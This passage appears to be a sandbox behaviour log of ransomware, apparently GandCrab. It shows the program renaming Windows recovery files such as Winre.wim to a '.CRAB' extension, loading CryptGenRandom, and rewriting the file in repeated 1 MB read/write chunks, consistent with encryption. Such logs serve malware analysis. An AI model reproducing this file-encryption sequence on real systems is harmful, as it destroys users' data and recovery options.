File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
